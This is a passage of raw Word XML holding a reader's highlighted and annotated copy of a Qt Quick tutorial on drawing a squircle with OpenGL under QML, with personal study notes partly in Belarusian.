          <w:t>QQuickWindow::beforeRendering</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() to the renderer's</w:t>
      </w:r>
      <w:r w:rsidR="00D1029A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>paint()</w:t>
      </w:r>
      <w:r w:rsidR="00D1029A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>slot.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0035792D" w:rsidRPr="00D1029A" w:rsidRDefault="0035792D" w:rsidP="0035792D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1029A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00D1029A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="00D1029A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2181" w:anchor="beforeSynchronizing" w:history="1">
        <w:r w:rsidRPr="0035792D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow::beforeSynchronizing</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">() signal is emitted on the rendering thread while the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1029A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GUI thread is blocked</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, so </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1029A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>it is safe to simply copy the value without any additional protection</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D1029A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D1029A" w:rsidRPr="00D1029A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intbu what protection can be?</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cleanup</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if</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m_renderer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delete</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> m_renderer</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m_renderer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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SquircleRenderer</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SquircleRenderer</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delete</w:t>
      </w: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D1029A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In the</w:t>
      </w:r>
      <w:r w:rsidR="00D1029A" w:rsidRPr="00D1029A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1029A">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cleanup()</w:t>
      </w:r>
      <w:r w:rsidR="00D1029A" w:rsidRPr="00D1029A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1029A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> we delete the renderer which in turn cleans up its own resources.</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void</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setT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qreal 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if</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t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m_t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return</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m_t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emit tChanged</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if</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window</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window</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update</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un"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0035792D" w:rsidRPr="009114F9" w:rsidRDefault="0035792D" w:rsidP="0035792D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When the value of</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>changes, we call</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2182" w:anchor="update" w:history="1">
        <w:r w:rsidRPr="0035792D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow::update</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() rather than</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2183" w:anchor="update" w:history="1">
        <w:r w:rsidRPr="0035792D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem::update</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:r w:rsidRPr="009114F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>because</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the former will force the entire window to be redrawn, even when the scene graph has not changed since the last frame.</w:t>
      </w:r>
      <w:r w:rsidR="009114F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009114F9" w:rsidRPr="009114F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intbu the reason better.</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lastRenderedPageBreak/>
        <w:t>void</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SquircleRenderer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paint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if</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m_program</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initializeOpenGLFunctions</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m_program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new</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QOpenGLShaderProgram</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addShaderFromSourceCode</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QOpenGLShader</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Vertex</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"attribute highp vec4 vertices;"</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"varying highp vec2 coords;"</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"void main() {"</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    gl_Position = vertices;"</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    coords = vertices.xy;"</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addShaderFromSourceCode</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QOpenGLShader</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Fragment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"uniform lowp float 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"varying highp vec2 coords;"</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"void main() {"</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    lowp float i = 1. - (pow(abs(coords.x), 4.) + pow(abs(coords.y), 4.));"</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    i = smoothstep(t - 0.8, t + 0.8, i);"</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    i = floor(i * 20.) / 20.;"</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    gl_FragColor = vec4(coords * .5 + .5, i, i);"</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bindAttributeLocation</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"vertices"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link</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35792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In the SquircleRenderer's</w:t>
      </w:r>
      <w:r w:rsidR="009114F9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009114F9">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>paint()</w:t>
      </w:r>
      <w:r w:rsidR="009114F9" w:rsidRPr="009114F9">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009114F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> we start by </w:t>
      </w:r>
      <w:r w:rsidRPr="009114F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>initializing the shader program</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. By initializing the shader program here, we make sure that the </w:t>
      </w:r>
      <w:r w:rsidRPr="009114F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OpenGL context is bound</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and that we </w:t>
      </w:r>
      <w:r w:rsidRPr="009114F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are on the correct thread</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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bind</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enableAttributeArray</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float</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> values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setAttributeArray</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GL_FLOAT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values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2</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setUniformValue</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"t"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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>float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m_t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glViewport</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m_viewportSize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width</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m_viewportSize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height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glDisable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GL_DEPTH_TEST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glClearColor</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glClear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GL_COLOR_BUFFER_BIT</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    glEnable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GL_BLEND</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glBlendFunc</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GL_SRC_ALPHA</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GL_ONE</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glDrawArrays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GL_TRIANGLE_STRIP</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4</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disableAttributeArray</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m_program</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release</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Not strictly needed for this example, but generally useful for when</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// mixing with raw OpenGL.</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m_window</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>resetOpenGLState</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35792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We </w:t>
      </w:r>
      <w:r w:rsidRPr="009114F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use the shader program to draw the squircle</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009114F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009114F9" w:rsidRPr="009114F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Гэты код мне пакуль не ясны.</w:t>
      </w:r>
      <w:r w:rsidRPr="009114F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">At the </w:t>
      </w:r>
      <w:r w:rsidRPr="009114F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>end</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>paint</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">function we </w:t>
      </w:r>
      <w:r w:rsidRPr="009114F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>release the program</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
